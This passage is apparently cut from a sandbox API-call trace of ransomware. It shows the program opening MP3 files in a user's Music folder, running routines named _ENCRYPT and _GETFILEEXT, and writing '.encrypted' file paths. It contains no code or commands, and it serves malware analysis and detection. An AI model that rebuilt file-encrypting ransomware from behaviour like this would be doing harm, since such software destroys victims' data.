Flags=0x0, Size=0x4) returned 0x7af378 [0037.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.986] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0037.986] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x23a4, lpOverlapped=0x0) returned 1 [0037.987] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0037.987] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x23a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.987] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0037.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.encrypted.mp3\r\n", cchWideChar=79, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0037.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4f) returned 0x7f3630 [0037.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.encrypted.mp3\r\n", cchWideChar=79, lpMultiByteStr=0x7f3630, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.encrypted.mp3\r\n", lpUsedDefaultChar=0x0) returned 79 [0037.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0037.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0037.987] WriteFile (in: hFile=0x128, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x4e, lpOverlapped=0x0) returned 1 [0037.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0037.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.987] CloseHandle (hObject=0x128) returned 1 [0037.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.988] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.988] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.988] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.989] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.989] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.989] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.989] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.989] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.989] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889538 [0037.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889538, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.989] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\gycwk0yfx3naemf50.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.990] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.990] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.990] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.990] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.990] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.990] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c838 [0037.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c838, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0037.991] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.991] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.991] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.991] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.991] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.991] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.991] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.991] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0037.992] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.992] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.992] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834f67b0, ftCreationTime.dwHighDateTime=0x1d5c055, ftLastAccessTime.dwLowDateTime=0x263901d0, ftLastAccessTime.dwHighDateTime=0x1d5c447, ftLastWriteTime.dwLowDateTime=0x263901d0, ftLastWriteTime.dwHighDateTime=0x1d5c447, nFileSizeHigh=0x0, nFileSizeLow=0xde21, dwReserved0=0x0, dwReserved1=0x777648, cFileName="gYCwk0YFX3naEmF50.mp3", cAlternateFileName="GYCWK0~1.MP3")) returned 0x7c20c0 [0037.992] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.992] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.993] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834f67b0, ftCreationTime.dwHighDateTime=0x1d5c055, ftLastAccessTime.dwLowDateTime=0x263901d0, ftLastAccessTime.dwHighDateTime=0x1d5c447, ftLastWriteTime.dwLowDateTime=0x263901d0, ftLastWriteTime.dwHighDateTime=0x1d5c447, nFileSizeHigh=0x0, nFileSizeLow=0xde21, dwReserved0=0x0, dwReserved1=0x777648, cFileName="gYCwk0YFX3naEmF50.mp3", cAlternateFileName="GYCWK0~1.MP3")) returned 0x7c20c0 [0037.993] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.993] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.994] CompareStringW 